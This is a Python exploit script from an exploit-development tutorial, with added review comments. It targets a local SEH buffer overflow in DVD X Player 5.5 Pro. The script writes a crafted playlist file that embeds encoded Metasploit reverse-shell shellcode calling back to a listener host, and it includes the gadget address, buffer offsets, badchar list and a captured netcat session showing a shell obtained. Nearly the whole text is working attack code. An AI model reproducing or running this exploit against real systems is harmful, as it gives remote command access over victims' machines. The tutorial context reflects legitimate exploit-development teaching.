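#!/usr/bin/env python
#----------------------------------------------------------------------------------#
# Exploit: DVD X Player 5.5 Pro SEH (local BOF)
# OS: Tested XP PRO SP3 (EPG.dll should be universal)
# Author: b33f (Ruben Boonen)
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications
#           /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe
#----------------------------------------------------------------------------------#
# This exploit was created for Part 3 of my Exploit Development tutorial series...
# http://www.fuzzysecurity.com/tutorials/expDev/3.html
#----------------------------------------------------------------------------------#
# root@bt:~# nc -lvp 9988
# listening on [any] 9988 ...
# 192.168.111.128: inverse host lookup failed: Unknown server error
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1044
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# G:\tutorial>ipconfig
# ipconfig
#
# Windows IP Configuration
#
#
# Ethernet adapter Local Area Connection:
#
#         Connection-specific DNS Suffix  . : localdomain
#         IP Address. . . . . . . . . . . . : 192.168.111.128
#         Subnet Mask . . . . . . . . . . . : 255.255.255.0
#         Default Gateway . . . . . . . . . :
#
# G:\tutorial>
#----------------------------------------------------------------------------------#
# Review notes (added; not part of the original header):
#  * Local file-format PoC: this script only writes a playlist file. The crash
#    and the reverse shell happen when DVD X Player 5.5 Pro opens that file on
#    the target. Nothing is sent over the network by this script itself.
#  * The reverse shell connects back to the LHOST/LPORT baked into the encoded
#    blob (192.168.111.132:9988). Changing either means regenerating the
#    payload with the same badchar list (see the msfencode line below).
#  * 0x61617619 is a static address inside EPG.dll. It is only useful while
#    that module loads at the base seen on the tested XP SP3 install (no ASLR
#    there); "should be universal" is the author's claim - re-verify the
#    gadget on any other build before relying on it.
#  * The original shebang was "python -w", which CPython rejects as an unknown
#    option. The file is now written in binary mode from bytes objects so the
#    shellcode bytes >= 0x80 survive unchanged under Python 3 as well.
#----------------------------------------------------------------------------------#
import struct

filename = "evil.plf"

# Bytes the author identified as bad for this file format (see the -b list
# passed to msfencode below). The encoded blob avoids them; the finished
# buffer is re-checked before writing so a regenerated payload that forgot
# the -b list fails loudly instead of producing a silently broken file.
BADCHARS = (b"\x00", b"\x0a", b"\x0d", b"\x1a")

#---------------------------------------------------------------------------------------------------------------#
# msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
#---------------------------------------------------------------------------------------------------------------#
# Opaque encoded blob as supplied by the author; only its length (341) and
# badchar-freedom are verified here, not its behaviour.
shellcode = (
    b"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
    b"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
    b"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
    b"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
    b"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
    b"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
    b"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
    b"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
    b"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
    b"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
    b"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
    b"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
    b"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
    b"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
    b"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
    b"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
    b"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
    b"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
    b"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
    b"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
    b"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
    b"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
    b"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54"
)

#----------------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A'
#
# Buffer layout (offsets derived from the concatenation below):
#
#   [ "A" * 608 ][ nSEH (4) ][ SEH (4) ][ NOPs + shellcode + "B" pad (1384) ]
#   offset 0      608         612        616
#
# SEH Exploit Structure:
#                      \---------------->
#   [AAA..................AAA] [nseh] [seh] [BBB..................BBB]
#                      \-------------------------------------->
#                                      <-------/
# (1) Initial EIP overwrite: the pop esi # pop edi # ret gadget at
#     0x61617619 (EPG.dll) returns 4 bytes back into nSEH.
# (2) nSEH = "\xEB\x06" (jmp short +6): skips its own 2 pad bytes and the
#     4-byte handler address, landing on the NOP sled.
# (3) Shellcode space = 1384 bytes: NOP sled + shellcode, "B"-padded.
#
# NOTE(review): the author's header gave the SEH offset as 112; the buffer
# as built places it at 612 (608 + 4), which is what the layout requires.
#----------------------------------------------------------------------------------#
NSEH_OFFSET = 608
PAYLOAD_SPACE = 1384

nseh = b"\xEB\x06\x90\x90"            # jmp short 6, then 2 bytes of NOP pad
seh = struct.pack("<I", 0x61617619)   # little-endian -> b"\x19\x76\x61\x61"

evil = b"\x90" * 20 + shellcode
if len(evil) > PAYLOAD_SPACE:
    # The original "B" * (1384 - len(evil)) would silently become empty and
    # overrun the space the author measured; fail instead.
    raise ValueError("payload is %d bytes, only %d available" % (len(evil), PAYLOAD_SPACE))

buffer = b"A" * NSEH_OFFSET + nseh + seh + evil + b"B" * (PAYLOAD_SPACE - len(evil))

found = [c for c in BADCHARS if c in buffer]
if found:
    raise ValueError("bad character(s) present in buffer: %r" % (found,))

# Binary mode: no newline translation and no text encoding of the payload.
with open(filename, "wb") as textfile:
    textfile.write(buffer)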